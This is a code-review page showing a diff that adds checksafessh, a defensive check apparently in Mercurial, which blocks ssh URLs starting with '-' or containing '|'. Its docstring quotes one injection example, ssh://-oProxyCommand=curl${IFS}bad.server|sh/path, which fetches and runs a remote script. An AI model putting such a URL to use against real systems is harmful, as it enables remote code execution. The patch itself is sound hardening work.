Show More
| @@ -2894,6 +2894,21 b' def hasdriveletter(path):' | |||||
| 2894 | def urllocalpath(path): |
|
2894 | def urllocalpath(path): | |
| 2895 | return url(path, parsequery=False, parsefragment=False).localpath() |
|
2895 | return url(path, parsequery=False, parsefragment=False).localpath() | |
| 2896 |
|
2896 | |||
|
|
2897 | def checksafessh(path): | |||
|
|
2898 | """check if a path / url is a potentially unsafe ssh exploit (SEC) | |||
|
|
2899 | ||||
|
|
2900 | This is a sanity check for ssh urls. ssh will parse the first item as | |||
|
|
2901 | an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path. | |||
|
|
2902 | Let's prevent these potentially exploited urls entirely and warn the | |||
|
|
2903 | user. | |||
|
|
2904 | ||||
|
|
2905 | Raises an error.Abort when the url is unsafe. | |||
|
|
2906 | """ | |||
|
|
2907 | path = urlreq.unquote(path) | |||
|
|
2908 | if path.startswith('ssh://-') or '|' in path: | |||
|
|
2909 | raise error.Abort(_('potentially unsafe url: %r') % | |||
|
|
2910 | (path,)) | |||
|
|
2911 | ||||
| 2897 | def hidepassword(u): |
|
2912 | def hidepassword(u): | |
| 2898 | '''hide user credential in a url string''' |
|
2913 | '''hide user credential in a url string''' | |
| 2899 | u = url(u) |
|
2914 | u = url(u) | |
General Comments 0
You need to be logged in to leave comments.
Login now